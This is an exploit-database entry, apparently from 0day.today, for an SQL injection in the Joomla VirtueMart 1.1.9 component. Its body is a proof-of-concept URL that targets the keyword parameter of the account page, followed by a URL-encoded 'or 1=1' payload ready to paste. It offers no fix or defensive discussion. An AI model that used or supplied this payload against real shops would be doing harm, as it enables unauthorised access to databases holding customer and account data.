Joomla component (com_virtuemart) SQL injection Vulnerability

2012-05-04T00:00:00
ID 1337DAY-ID-18192
Type zdt
Reporter ReeD
Modified 2012-05-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ##################################################
# Exploit Title: joomla component (com_virtuemart) SQL injection Vulnerability
# Download: http://dev.virtuemart.net/attachments/download/287/VirtueMart_1.1.9-COMPLETE_PACKAGE.j15.zip
# Software Link: http://virtuemart.net/
# Date: 2012.05.04
# Category: webapps
# Author: ReeD
# E-mail: [email protected]
# Version: 1.1.9
##################################################

Exploiting these issue could allow an attacker to compromise the application, if i have user access.

[~]Exploit/p0c:
http://www.site.com/index.php?option=com_virtuemart&page=account.index&keyword=[sqli]

Example:
http://www.site.com/index.php?option=com_virtuemart&page=account.index&keyword=%25%2527%29+or+1%3D1%23



#  0day.today [2018-01-04]  #